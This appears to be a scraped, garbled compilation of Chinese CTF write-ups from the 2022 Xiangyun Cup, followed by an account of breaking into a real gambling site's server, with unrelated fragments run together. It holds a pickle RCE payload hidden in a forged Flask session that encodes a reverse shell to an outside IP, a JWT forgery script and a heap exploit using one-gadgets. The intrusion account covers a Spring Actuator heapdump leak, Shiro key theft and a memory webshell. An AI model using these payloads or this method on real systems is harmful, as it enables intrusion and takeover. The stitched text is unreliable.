0: ( MARK 1: S STRING 'shanghe1' 12: S STRING 'shanghe' #这里的意思是压进去第一个字典 23: d DICT (MARK at 0) 24: ( MARK 25: S STRING 'shanghe2' 36: S STRING 'shanghe' 47: d DICT (MARK at 24) #再往栈里面压进去第二个字典 48: ( MARK 49: c GLOBAL 'os system' 60: S STRING 'dir' 67: o OBJ (MARK at 48) #这里用我们逃出来的o指令进行命令执行 68: s SETITEM #最后s的指令就会把 o指令执行后的内容以及shanghe2的键值对压进去shanghe1的字典里面,作为新的键值对。 69: . STOP highest protocol among opcodes = 1 最后直接拿flag即可。也可以编码用v指令任意命令执行反弹shell都可以import pickle import base64 import os code=b'''(S'shanghe'\nS'shanghe'\ndS'shanghe'\n(cos\nsystem\nS'cat f* >xxx'os.''' code=base64.b64encode(code) print(code) # pickle.loads(base64.b64decode(code))然后伪造即可替换原来的sesison,然后访问admin页面即可 python3 flask_session_cookie_manager3.py encode -s "6174" -t "{'user': 'admin','ser_data':b'KFMnc2hhbmdoZScKUydzaGFuZ2hlJwpkUydzaGFuZ2hlJwooY29zCnN5c3RlbQpWXHUwMDYyXHUwMDYxXHUwMDczXHUwMDY4XHUwMDIwXHUwMDJEXHUwMDYzXHUwMDIwXHUwMDI3XHUwMDczXHUwMDY4XHUwMDIwXHUwMDJEXHUwMDY5XHUwMDIwXHUwMDNFXHUwMDI2XHUwMDIwXHUwMDJGXHUwMDY0XHUwMDY1XHUwMDc2XHUwMDJGXHUwMDc0XHUwMDYzXHUwMDcwXHUwMDJGXHUwMDM0XHUwMDM3XHUwMDJFXHUwMDM5XHUwMDM2XHUwMDJFXHUwMDM0XHUwMDMxXHUwMDJFXHUwMDMxXHUwMDMwXHUwMDMzXHUwMDJGXHUwMDMxXHUwMDMzXHUwMDMzXHUwMDM3XHUwMDIwXHUwMDMwXHUwMDNFXHUwMDI2XHUwMDMxXHUwMDI3Cm9zLg=='}
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} //80
winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"} //443
修改监听端口为80/443
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
winrm set winrm/config/Listener?Address=*+Transport=HTTPS @{Port="443"}
fromdatetimeimporttimedeltafromjsonimportloads,dumpsfromjwcrypto.commonimportbase64url_decode,base64url_encodedeftopic(topic):""" Use mix of JSON and compact format to insert forged claims including long expiration """[header,payload,signature]=topic.split('.')parsed_payload=loads(base64url_decode(payload))parsed_payload['is_admin']=1parsed_payload['exp']=2000000000fake_payload=base64url_encode((dumps(parsed_payload,separators=(',',':'))))return'{" '+header+'.'+fake_payload+'.":"","protected":"'+header+'", "payload":"'+payload+'","signature":"'+signature+'"}'token=topic('eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NjcxMzcwMzAsImlhdCI6MTY2NzEzNjczMCwiaXNfYWRtaW4iOjAsImlzX2xvZ2luIjoxLCJqdGkiOiJ4YWxlR2dadl9BbDBRd1ZLLUgxb0p3IiwibmJmIjoxNjY3MTM2NzMwLCJwYXNzd29yZCI6IjEyMyIsInVzZXJuYW1lIjoiMTIzIn0.YnE5tK1noCJjultwUN0L1nwT8RnaU0XjYi5iio2EgbY7HtGNkSy_pOsnRl37Y5RJvdfdfWTDCzDdiz2B6Ehb1st5Fa35p2d99wzH4GzqfWfH5zfFer0HkQ3mIPnLi_9zFiZ4mQCOLJO9RBL4lD5zHVTJxEDrESlbaAbVOMqPRBf0Z8mon1PjP8UIBfDd4RDlIl9wthO-NlNaAUp45woswLe9YfRAQxN47qrLPje7qNnHVJczvvxR4-zlW0W7ahmYwODfS-KFp8AC80xgMCnrCbSR0_Iy1nsiCEO8w2y3BEcqvflOOVt_lazJv34M5e28q0czbLXAETSzpvW4lVSr7g')print(token)
这里注册一个 123/123 用户, 然后用网站给的 token 来打
注意 parsed_payload['is_admin'] = 1 里面的 1 必须是 int 类型
import numpy as np
import cv2
from PIL import Image
img1 = cv2.imread('0o0o0.bmp')
img1 = img1.astype('float32')
img2 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
w,h = 128,128
r = 4
water = Image.new('L', (w, h), 255)
res = []
a = int(img2.shape[0] / 8)
b = int(img2.shape[1] / 8)
for i in range(a):
for j in range(b):
dct = cv2.dct(img2[8*i:8*i+8, 8*j:8*j+8])
for m in range(r):
rx,ry = 4-m,4+m
r1 = dct[rx,ry]
r2 = dct[7-rx,7-ry]
if r1>r2:
water.putpixel((i*2+m%2,j*2+m//2),0)
res.append(0)
else:
water.putpixel((i*2+m%2,j*2+m//2),255)
res.append(1)
print(res)
water.show()
获得图片
读取,转ascii码,发现结果不对,尝试xor了一下0xff,获得flag
from PIL import Image
im = Image.open("water.bmp")
im = im.convert("L")
w,h = im.size
flag = []
k = 0
for i in range(h):
for j in range(w):
if im.getpixel((j,i)) != 255:
k += 1
else:
flag.append(k)
k = 1
for i in flag:
print(chr(i^0xff),end="")
import csv
from hashlib import new
list1 = []
with open('dump.csv') as f:
reader = csv.reader(f)
for row in reader:
list1.append(row)
newlist = []
for i in range(1,len(list1)-1):
if len(list1[i][6]) == 16:
newlist.append(list1[i][6])
strings = ''.join(newlist)
#hex转换,保存为exe
with open('1.exe', 'wb') as f:
f.write(bytes.fromhex(strings))
from email import message
from encodings import utf_8
from Crypto.Util.number import *
from Crypto.Cipher import AES
import binascii
import hashlib
checknum = 0x3fba64ad7b78676e464395199424302b21b2b17db2
def XOR(a,b):
c = []
for i,j in zip(a,b):
c.append(i^j)
return bytes(c)
#16进制
strlist = "0123456789abcdef"
for a in strlist:
for b in strlist:
for c in strlist:
key = '4d9a700010437'+a+b+c
key = key.encode()
l = len(key) #16
message = b'Do you ever feel, feel so paper thin, Like a house of cards, One blow from caving in' + binascii.unhexlify(hashlib.sha256(key).hexdigest())[:10]
message = message + bytes((l - len(message) % l) * chr(l - len(message) % l), encoding = 'utf-8')
aes = AES.new(key,AES.MODE_ECB)
data1 = long_to_bytes(checknum)
check = data1[:-16] #flag{
encode= data1[-16:] #}
#decode
decode = aes.decrypt(encode)[-5:]
if check == XOR(decode,message[-5:]):
print(key)
break
获得key:4d9a7000104376fe
有了key之后就可以带入之前的程序继续计算就行了
#题目给的
key = "4d9a7000104376fe"
key = key.encode()
l = len(key) #16
message = b'Do you ever feel, feel so paper thin, Like a house of cards, One blow from caving in' + binascii.unhexlify(hashlib.sha256(key).hexdigest())[:10]
message = message + bytes((l - len(message) % l) * chr(l - len(message) % l), encoding = 'utf-8')
aes = AES.new(key,AES.MODE_ECB)
#clac
msg = []
for i in range(6):
temp = message[i*16:(i+1)*16]
msg.append(temp)
msg = msg[::-1]
flag = long_to_bytes(checknum)[-16:]
for i in range(6):
flag = aes.decrypt(flag)
flag = XOR(flag, msg[i])
print(flag)
from Crypto.Util.number import *
from random import *
from libnum import *
import gmpy2
from itertools import combinations, chain
e = 65537n = 141321067325716426375483506915224930097246865960474155069040176356860707435540270911081589751471783519639996589589495877214497196498978453005154272785048418715013714419926299248566038773669282170912502161620702945933984680880287757862837880474184004082619880793733517191297469980246315623924571332042031367393c = 81368762831358980348757303940178994718818656679774450300533215016117959412236853310026456227434535301960147956843664862777300751319650636299943068620007067063945453310992828498083556205352025638600643137849563080996797888503027153527315524658003251767187427382796451974118362546507788854349086917112114926883tp = [gmpy2.mpz(1 << i) for i inrange(512)]
it = chain(*[combinations(range(3, 417 - 3), i) for i inrange(4)])
for cf in it:
A = -sum([tp[i] for i in cf])
D = A**2 + 4 * n
if gmpy2.is_square(D):
d = gmpy2.isqrt(D)
p = (-A + d) // 2 q = n // p
breakx=p-1d = pow(e, -1, (p - 1) * (q - 1))
m=pow(c, d, n)
print(pow(c, d, n))
print(long_to_bytes(m^(x**2)))
2.common_rsa
利用在线分解直接出p,q。
然后常规 RSA 解密即可:
import libnum
from Crypto.Util.number import long_to_bytes
c = 97724073843199563126299138557100062208119309614175354104566795999878855851589393774478499956448658027850289531621583268783154684298592331328032682316868391120285515076911892737051842116394165423670275422243894220422196193336551382986699759756232962573336291032572968060586136317901595414796229127047082707519
n = 253784908428481171520644795825628119823506176672683456544539675613895749357067944465796492899363087465652749951069021248729871498716450122759675266109104893465718371075137027806815473672093804600537277140261127375373193053173163711234309619016940818893190549811778822641165586070952778825226669497115448984409
e = 31406775715899560162787869974700016947595840438708247549520794775013609818293759112173738791912355029131497095419469938722402909767606953171285102663874040755958087885460234337741136082351825063419747360169129165
q = 21007149684731457068332113266097775916630249079230293735684085460145700796880956996855348862572729597251282134827276249945199994121834609654781077209340587
p = 12080882567944886195662683183857831401912219793942363508618874146487305963367052958581455858853815047725621294573192117155851621711189262024616044496656907
d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n)
print(long_to_bytes(m))
(不理解这道题为什么没多少人做, 当时做的时候看到 e 很大想到了维纳攻击,但没想到网上可以直接查到 n 的分解,也就没有进一步分解代码直接解了)
import libnum
from Crypto.Util.number import long_to_bytes
n = 113793513490894881175568252406666081108916791207947545198428641792768110581083359318482355485724476407204679171578376741972958506284872470096498674038813765700336353715590069074081309886710425934960057225969468061891326946398492194812594219890553185043390915509200930203655022420444027841986189782168065174301
c = 64885875317556090558238994066256805052213864161514435285748891561779867972960805879348109302233463726130814478875296026610171472811894585459078460333131491392347346367422276701128380739598873156279173639691126814411752657279838804780550186863637510445720206103962994087507407296814662270605713097055799853102
e = 65537
tag1 = 1
tag2 = 0
F = open("trace.out","r")
arr = F.readlines()
for i in arr[::-1]:
if "a = a - b" in i:
tag1 = tag1 + tag2
#print(tag1)#print(tag2) if "a, b = b, a" in i:
tag1, tag2 = tag2, tag1
#print(tag1)#print(tag2) if "a = rshift1(a)"in i:
tag1 = tag1 << 1
#print(tag1)#print(tag2) if "b = rshift1(b)" in i:
tag2 = tag2 << 1
#print(tag1)#print(tag2)phi = tag1
#print(phi)d = libnum.invmod(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
测试输入数据和输出数据寻找规律发现是输入转ascii码然后三次方得到输出 from Crypto.Util.number import long_to_bytesimport gmpy2print(gmpy2.iroot(7212272804013543391008421832457418223544765489764042171135982569211377620290274828526744558976950004052088838419495093523281490171119109149692343753662521483209758621522737222024221994157092624427343057143179489608942837157528031299236230089474932932551406181, 3))#6374667b746831735f69735f7265346c6c795f626561757431666c795f72316768743f7da='6374667b746831735f69735f7265346c6c795f626561757431666c795f72316768743f7d'for i in range(0,len(a),2): print('0x'+a[i]+a[i+1],end=',')print('flag:')#0x63,0x74,0x66,0x7b,0x74,0x68,0x31,0x73,0x5f,0x69,0x73,0x5f,0x72,0x65,0x34,0x6c,0x6c,0x79,0x5f,0x62,0x65,0x61,0x75,0x74,0x31,0x66,0x6c,0x79,0x5f,0x72,0x31,0x67,0x68,0x74,0x3f,0x7db=[0x63,0x74,0x66,0x7b,0x74,0x68,0x31,0x73,0x5f,0x69,0x73,0x5f,0x72,0x65,0x34,0x6c,0x6c,0x79,0x5f,0x62,0x65,0x61,0x75,0x74,0x31,0x66,0x6c,0x79,0x5f,0x72,0x31,0x67,0x68,0x74,0x3f,0x7d]for i in range(len(b)): print(chr(b[i]),end='')
for i in range(0x8): add(i,0x88) add(8,0x58) add(9,0x88) add(10,0x88) for i in range(7): delete(i) delete(7) edit(8,'1'*(0x58*8)) edit(8,'a'*0x58*8) edit(8,'1'*0x50*8+'a'*4+'1'*4) delete(9) for i in range(0x8): add(i,0x88) show(8) libc_base=u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3ebca0 success("libc_base = "+hex(libc_base)) add(9,0x68) delete(10) for i in range(7): delete(i) for i in range(0x7): add(i,0x68) delete(3) delete(4) delete(5) delete(6) delete(1) delete(2) delete(8) show(9) sh.recvuntil("Content: ") heap_base=u64(sh.recv(6).ljust(8, '\0'))-0x860 success("heap_base = "+hex(heap_base)) free_hook = libc_base + libc.sym['__free_hook'] ret = libc_base + 0x00000000000008aa # ret pop_rdi_ret = libc_base + 0x000000000002164f# pop rdi ; ret pop_rsi_ret = libc_base + 0x0000000000023a6a # pop rsi ; ret pop_rdx_rsi_ret = libc_base +0x0000000000130539# pop rdx ; pop rsi ; ret pop_rdx_ret = libc_base + 0x0000000000001b96# malloc_hook=libc_base+libc.sym["__malloc_hook"]-0x10 realloc=libc_base+libc.symbols['__libc_realloc'] one=libc_base+0x4f302 add(1,0x68) add(2,0x68) edit(2,p64(0)+p64(one)+p64(realloc+2)) add(3,0x10) sh.interactive()
GET /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s&pageNo=1&pageSize=9 HTTP/1.1
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
先尝试目录扫描看能不能发现一些后台之类的,这里我用的是dirsearch。
但是很遗憾,没有什么有价值的目录,连后台也扫不出来,但是这是在意料之中,毕竟大部分菠菜网站防护都做的挺好的。接下里尝试注册一个账号看看
尝试注入,发现加密,不会逆向的我只能暂时放弃。
注册成功后发现一个上传接口
上传成功但是查看后发现他是以id的形式存储,无法形成上传漏洞放弃。
这个网站拿不下来转换思路尝试对整个ip进行渗透,首先要对这个ip的全端口进行扫描,尽量获取到比较全的信息。获得了两个web页面。rocketmq,这个有最新版漏洞爆出来尝试
找到工具尝试攻击,但是失败不能执行命令。
还有另外一个登录界面
发现存在shiro框架
尝试爆破但是未发现秘钥。
看了一下burp发现他会访问登录页面再进行跳转
眉头一皱发现事情并不简单,在ip后随便加了一点,导致其报错,发现其使用的是spring框架。
Actuator 是 Spring Boot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。Actuator
的核心是端点 Endpoint,它用来监视应用程序及交互,spring-boot-actuator 中已经内置了非常多的
Endpoint(health、info、beans、metrics、httptrace、shutdown等等),同时也允许我们自己扩展自己的
Endpoints。每个 Endpoint 都可以启用和禁用。要远程访问 Endpoint,还必须通过 JMX 或 HTTP 进行暴露,大部分应用选择HTTP。
并发现其中存在heapdump,下载下来。Heap Dump也叫堆转储文件,是一个Java进程在某个时间点上的内存快照。可以通过Eclipse MemoryAnalyzer工具对泄露的heapdump文件进行分析,查询加载到内存中的明文密码信息,比如redis密码,mysql数据库账号和密码。这里我用的是whwlsfb师傅的JDumpSpider
成功获取shiro的key
打入内存马。
获取管理员权限
.
C:\Users\Administrator\Desktop\easypickle\venv\Scripts\python.exe C:/Users/Administrator/Desktop/easypickle/3.py 
![图片[1]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/g10rnfhskby15307.png)
![图片[2]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/tmn0zmfpafb15311.png)
![图片[3]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/cyjmd0h5etr15313.png)
![图片[4]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/yo1op1tvs4o15316.png)
![图片[5]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/3hperf02pt515319.png)
![图片[6]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/1un2gesk5ys15321.png)
![图片[7]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/uo2socrvfgl15336.png)
![图片[8]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/34yafk2n2jx15349.png)
![图片[9]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/hw2naoslhqc15354.png)
![图片[10]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/skcvru0kmwe15355.png)
![图片[11]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/cagi05ogd3a15359.png)
![图片[12]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/q4c1hcl0srr15361.png)
![图片[13]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/rliv2ushbk415362.png)
![图片[14]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/wp1mj5kjryh15365.png)
![图片[15]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/fvtaepedizi15368.png)
![图片[16]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/vn1dk30cxnj15370.png)
![图片[17]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/nyaycboc2aa15371.png)
![图片[18]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/nwli2fgmmtd15372.png)
![图片[19]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/zmej3jacsps15375.png)
![图片[20]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/nioj2jw4ygj15377.png)
![图片[21]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/5qnudvmwdlj15379.png)
![图片[22]-2022祥云杯ALLMISC Writeup-魔法少女雪殇](https://hacker.bz/t/tu/hbq4evdwu4p15380.png)
![图片[1]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/4crgjkn45cz12839.png)
![图片[2]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/ddr11cshus312840.png)
![图片[3]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/kcjigw1jkju12843.png)
![图片[4]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/kqokngr35tb12846.png)
![图片[5]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/u33ggi1tewx12848.png)
![图片[6]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/545jxe3jn2o12850.png)
![图片[7]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/qw330cgj00m12854.png)
![图片[8]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/0vvhx3bpmzv12856.png)
![图片[9]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/gdezyjgqcxr12857.png)
![图片[10]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/sla0kwd2mtg12859.png)
![图片[11]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/f2r4fjwwyvu12860.png)
![图片[12]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/0nyazyezg0012862.png)
![图片[13]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/0wzzrj4swo012864.png)
![图片[14]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/nipezbi3zci12866.png)
![图片[15]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/12ibswnl0js12868.png)
![图片[16]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/sgz1gdn1zqg12870.png)
![图片[17]-渗透进入菠菜服务器(实战)-可能资源网](https://hacker.bz/t/tu/eekqbjghmtx12872.png)
